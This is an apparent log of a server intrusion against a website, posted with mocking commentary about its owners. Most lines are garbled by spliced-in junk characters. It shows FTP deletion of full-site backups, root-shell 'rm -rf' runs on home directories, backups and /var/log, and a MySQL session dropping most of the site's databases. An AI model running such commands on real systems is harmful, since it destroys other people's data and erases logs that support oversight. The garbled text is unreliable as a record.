' N7 x! l. F! ~: J227 Entering Passive Mode (212,254,194,163,2,189)* U7 ?! Z- X% z' D% U( }7 u0 K! P
150 Opening BINARY mode data connection for ‘file list’.4 f0 g7 q2 C' P! ~! O/ l2 v
-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar" A/ y' G9 \% T. u8 @, T9 t
-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2
9 |( @ y- b, e' o-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2
. w, z( i+ e% M$ d' t-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar, d3 g. J. w% A" }1 n, ~* `
-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar: q. |% X: P+ h( b( E: F. @
[snip]/ n+ f+ g9 _7 ~( O' o; O
226 Transfer complete.5 m8 ~9 V" b" w: O/ R3 m: \
ftp> mdelete *2 F' g( M( F8 P9 O0 q
ftp> ls -la
, V* i7 v' ~. I( A* k227 Entering Passive Mode (212,254,194,163,2,193)
?4 i. \2 y2 G( |150 Opening BINARY mode data connection for ‘file list’./ B4 W' J. N# M4 o$ P% q7 n
226 Transfer complete.
' R* ^5 H% ?5 }ftp># d, J! y% f5 d6 h) h* D$ a8 E( s
0 l0 n! u# `% {7 ?/ L
sh-3.2# cd /home- _+ ?2 a8 B7 J+ R
sh-3.2# ls -la
5 F' I- x$ _/ utotal 1203 E0 T+ F: ]* s1 j8 h$ W {
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .
: o6 y2 _- B; o6 T+ c: Ldrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
5 p* @* J& S, u6 |drwx–x–x 9 admin admin 4096 Nov 28 2007 admin+ ] ^$ V$ n7 ]: I& G6 t
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group% T3 E5 Y) g# ^0 Z
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user! p5 U+ U% M, t6 w6 V' z y4 K& Q
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet! @8 y: O2 N7 r4 T4 b9 ]* H
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup* @7 u' G6 e. d0 e) q# w. v$ C6 T
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161, b' |# X& |) j% w
drwx–x–x 10 com com 4096 Apr 28 12:40 com: V% L: M/ @2 @' f3 C: F2 ?
drwxr-xr-x 2 root root 4096 May 17 2007 ftp
$ V% q$ g+ d' l, x/ a. J5 k3 G$ N1 {drwx—— 3 jon jon 4096 Sep 21 2007 jon
/ h1 I& T" K. y! Qdrwx—— 2 root root 16384 Sep 11 2007 lost+found
) \0 a1 q$ B3 mdrwxr-xr-x 2 root root 4096 Sep 14 2007 my& K' I) I, K9 x0 ]8 C; w( o
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
* C) x* \" I9 N0 N9 R" udrwx—— 2 jon jon 4096 Sep 15 2007 test
& J. V9 _# E/ R3 I, \( Rdrwxrwxrwt 2 root root 4096 Jul 29 2008 tmp& G- W9 V( [2 z/ @* v/ u
1 T( F# S! M$ @: c' b3 M: y
sh-3.2# rm -rf backup/1 Y5 E, p% h, x9 Z2 w7 f4 B
sh-3.2# rm -rf backup.14161/1 [1 ^* ~: ~! X4 y
sh-3.2# rm -rf ftp/
2 c* q; p$ f( {sh-3.2# rm -rf jon/
?, a- P: j* O. Ksh-3.2# rm -rf my/+ P) Z8 m% Y+ s* a y0 P& ~: F+ Z
sh-3.2# rm -rf mysqldata/
1 S% j C( y* N5 hsh-3.2# rm -rf test/) b1 M7 ?$ }$ W2 y
sh-3.2# rm -rf tmp/
' x0 J( N( o5 e4 |4 h- @* Hsh-3.2# cd ~3 Z- Q8 f4 }+ m# E* B2 }. I
sh-3.2# rm -rf *! g' |1 _9 Z+ W. \0 X) V
sh-3.2# rm -rf /var/log/' J8 _1 G. H; [8 ?7 u- W
rm: cannot remove directory `/var/log//proftpd’: Directory not empty
' A; \3 _. w3 R% u- g% `" ]( gsh-3.2# rm -rf /home/*
) Y! r2 f# k" H5 `7 h* P" \/ I- Bsh-3.2# mysql# p( a& Q8 p4 R
Welcome to the MySQL monitor. Commands end with ; or \g.0 j# W. d6 H6 @1 m# H I
Your MySQL connection id is 407156
; j6 d6 f7 j/ ^* `: h7 AServer version: 5.0.45-community-log MySQL Community Edition (GPL)) `: z8 D" t8 j' r" ]
# C3 C( }& O, t1 o& F; b8 w8 ~: lType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
# Q6 V6 O5 }' h, `8 h
- Y& f0 u: n. J( ]' [) \mysql> show databases;
; E+ S/ H" X% Z+———————–+
. X% ]6 j6 `: a" J9 ~- U& q. Y| Database |) x+ ~ c5 W+ s" f
+———————–+
+ l' o/ @/ j1 E6 {; w| information_schema |
* J! U5 ]- Y& m+ {5 ~. {6 x9 n| astanet_ads |
' P% S$ R. X; ]6 t8 y F# E7 O| astanet_mailing_lists |
# e5 ^9 G5 \9 K2 G| astanet_mediawiki |
/ O2 ?0 J& T. j+ x+ a+ C9 _| astanet_membersystem |
: k I6 k$ w6 x| com_contrexx |8 ^% |& C3 X8 h1 N# k& [
| com_contrexx2 |
n S( l2 }6 z- q5 W| com_contrexx2_live |
4 o; M$ v+ S' w( T" r| da_roundcube |
3 D, r& L" j4 y* ?+ n" \| dolphin |2 L' l5 d2 p, C" J3 t
| ideapool |
; s$ V" j8 I7 ?| mysql |
" r( z% x# n2 @5 f; n| test |; a) L y4 Z3 D& e
| yourmaster |
0 X3 q3 x: r0 W% V4 B+———————–+/ T1 E7 b' H: [2 z/ [
14 rows in set (0.03 sec)
, a7 ^, x5 i# X9 W; V* e }; s: E/ K4 p1 ~* D' ~8 _0 `
mysql> drop database astanet_membersystem;
6 p) U- w1 _3 p: IdroQuery OK, 46 rows affected (0.81 sec)! ^6 ?4 y( E( O) i" x
. R! f7 `5 I" Z( _
mysql> drop database com_contrexx;- M1 _/ V: S h
Query OK, 211 rows affected (2.72 sec)' k; H! I- J% s' P9 B: [7 ^. O
8 ^2 T" r4 G3 l: L+ D4 v
mysql> drop database com_contrexx2;
! S0 `" F# A0 ~8 P% \2 `Query OK, 237 rows affected (2.23 sec)
! Q- g9 U7 b! Q; t2 x7 O% U. f* L
5 l7 H- c$ C; H& e5 L4 w, P6 r3 jmysql> drop database com_contrexx2_live;
4 ^. g, _1 Y) h- BQuery OK, 227 rows affected (7.63 sec)$ X, N3 ?4 f( F) l/ d8 J) s* x
1 D4 J5 u0 k& D0 qmysql> drop database ideapool;
9 \* }4 l2 H- `$ X+ x& ?Query OK, 69 rows affected (0.19 sec)0 q4 l V8 q& t$ C
. R( ]' Q& W# n" Z7 O$ M
mysql> drop database yourmaster;( q$ b9 G( A- D/ V
Query OK, 158 rows affected (0.55 sec)3 Z+ T; J$ J6 W% v) s7 m
0 X2 ^7 O8 J) ` G' n) @+ P( Hmysql> drop database astanet_ads;" g1 Q1 j) M: P8 w% j: y! s
Query OK, 9 rows affected (0.11 sec)
& y2 H5 ~2 t, p" a3 b) H; ?8 a
% r, S: w* @/ m- g7 Hmysql> drop database astanet_mailing_lists;
7 g, U! p8 d0 P. WQuery OK, 24 rows affected (1.47 sec)8 T: f7 ?5 ?2 R' O% g
3 I8 z" b: l+ f! b# u0 D$ t, K- q
mysql> drop database astanet_mediawiki;
2 K) ?$ b$ B: Q! F5 e4 G4 VQuery OK, 31 rows affected (0.51 sec)+ a8 S: k) W$ Y/ p# I( C9 ^( }) d
6 I! k* {8 u9 K5 Emysql> show databases;
8 Y; ~& j6 H: h% E R2 k' e6 a+——————–+
; k; z; D( M* a( L) U, ]( M$ U| Database |1 Q$ k' X$ g6 P0 I6 a6 C4 q/ ?
+——————–+
: z( A; L- k) P8 M& Z| information_schema |5 M% L/ A# L8 [! g) l0 b6 L( m, f
| da_roundcube |& L% B2 K( _& J! C, `" o* C9 U
| dolphin |
0 _8 ^: j( g# [# @7 c* X| mysql |
& D9 t4 M. K' ]3 x| test |
* {( Q5 Z7 l; m! T+——————–+
5 ~- u; y; e' g S" I; G5 rows in set (0.00 sec)5 S: ~+ ^ y& J8 ?
0 _% u p# S. }/ `What a journey! We’re not sure exactly why the “Terminator” had any influence on
0 v% X/ z# K9 Ftheir naming (conventions) but we’re sure Arnold himself wouldn’t be in the; b) Z1 U2 v( ]5 W1 ~, j. [2 K. S P
wrong to say this pack of morons *wont be back*.
" m4 H% R$ n0 J |